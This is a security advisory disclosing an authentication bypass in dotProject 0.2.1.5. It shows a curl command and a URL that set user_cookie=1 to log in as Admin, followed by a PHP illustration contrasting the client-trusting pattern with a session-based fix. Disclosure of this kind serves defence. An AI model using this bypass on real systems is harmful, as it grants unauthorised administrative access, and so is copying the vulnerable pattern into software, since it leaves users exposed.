SCAN Associates Sdn Bhd Security Advisory

Product: dotProject 0.2.1.5 (possibly other versions)
Vendor URL: http://www.dotmarketing.org/dotproject/
Summary: dotProject (PHP) authentication bypass
Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>, shaharil <shaharil@scan-associates.net>

Description
===========

dotProject is a web-based project management system. This application is considered a beta version.

Details
=======

Anyone can bypass authentication and log in as Admin. It is rather simple to exploit: a user may send a crafted cookie like

    curl -b user_cookie=1 http://server/project/index.php?m=projects

or simply append user_cookie=1 to any URL:

    http://server/project/index.php?m=projects&user_cookie=1

Vendor Response
===============

The vendor was contacted on 24/7/2002 but there has been no reply.

www.scan-associates.net <http://www.scan-associates.net>
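As an added illustration (this is not dotProject's code), the pattern behind the bypass beside a hardened form; the assumption that the user id was read from a PHP global populated from either the cookie or the query string (register_globals behaviour) is drawn from the fact that both vectors work, and the function and user names are constructed for the example.

```php
<?php
// Added illustration of the pattern described in the advisory; NOT dotProject's code.
// Assumption: the application identified the logged-in user from a variable named
// $user_cookie that PHP filled from either the Cookie header or the query string
// (register_globals behaviour), so any client could set it to the admin id.

// --- Vulnerable pattern (hypothetical reconstruction) ----------------------
function current_user_vulnerable()
{
    // With register_globals on, $user_cookie is set from ?user_cookie=1 or
    // from "Cookie: user_cookie=1" with no server-side check at all.
    global $user_cookie;
    if (isset($user_cookie)) {
        return (int) $user_cookie;   // trusted straight from the client
    }
    return null;
}

// --- Hardened pattern ------------------------------------------------------
// The user id lives only in the server-side session, which is populated after
// a successful password check. Request values named user_cookie are ignored.
function login(string $username, string $password, array $users): bool
{
    if (!isset($users[$username])
        || !password_verify($password, $users[$username]['hash'])) {
        return false;
    }
    session_regenerate_id(true);               // new id on privilege change
    $_SESSION['user_id'] = $users[$username]['id'];
    return true;
}

function current_user_hardened(): ?int
{
    // Only the session is consulted; $_GET / $_COOKIE['user_cookie'] never are.
    return isset($_SESSION['user_id']) ? (int) $_SESSION['user_id'] : null;
}

// Usage with constructed data (no request-supplied value can set user_id).
session_start();
$users = ['admin' => ['id' => 1,
                      'hash' => password_hash('correct horse', PASSWORD_DEFAULT)]];
var_dump(current_user_hardened());                  // not logged in yet
var_dump(login('admin', 'wrong password', $users)); // rejected
var_dump(login('admin', 'correct horse', $users));  // accepted
var_dump(current_user_hardened());                  // admin's id from the session
```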